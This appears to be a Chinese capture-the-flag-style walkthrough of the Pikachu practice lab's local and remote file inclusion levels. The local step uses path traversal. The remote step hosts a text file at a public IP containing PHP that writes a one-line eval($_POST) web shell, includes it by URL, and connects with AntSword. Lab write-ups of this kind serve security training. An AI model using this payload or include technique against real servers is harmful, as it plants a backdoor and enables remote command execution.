pikachu文件包含漏洞靶场攻略

admin2024-09-05  24

1.File inclusion(local)(本地文件包含)

步骤一:选择一个球员提交

pikachu文件包含漏洞靶场攻略,第1张

步骤二:filename后面输入../../../../shw.php访问php文件

pikachu文件包含漏洞靶场攻略,第2张

2.File Inclusion(remote)(远程文件包含)

步骤一:修改配置

远程包含漏洞的前提:需要php.ini配置如下:

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

pikachu文件包含漏洞靶场攻略,第3张

步骤二:选择一个球员提交

pikachu文件包含漏洞靶场攻略,第4张

步骤三:宝塔公网上创建一个6.txt文件,里面输入<?php fputs(fopen("shw.php","w"),'<?php eval($_POST["cmd"]);?>')?>

pikachu文件包含漏洞靶场攻略,第5张

步骤四:filename后面输入http://47.113.231.0/6.txt

pikachu文件包含漏洞靶场攻略,第6张

步骤五:fileinclude目录下找到php文件

pikachu文件包含漏洞靶场攻略,第7张

步骤六:访问php文件,蚁剑连接

pikachu文件包含漏洞靶场攻略,第8张

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明原文出处。如若内容造成侵权/违法违规/事实不符,请联系SD编程学习网:675289112@qq.com进行投诉反馈,一经查实,立即删除!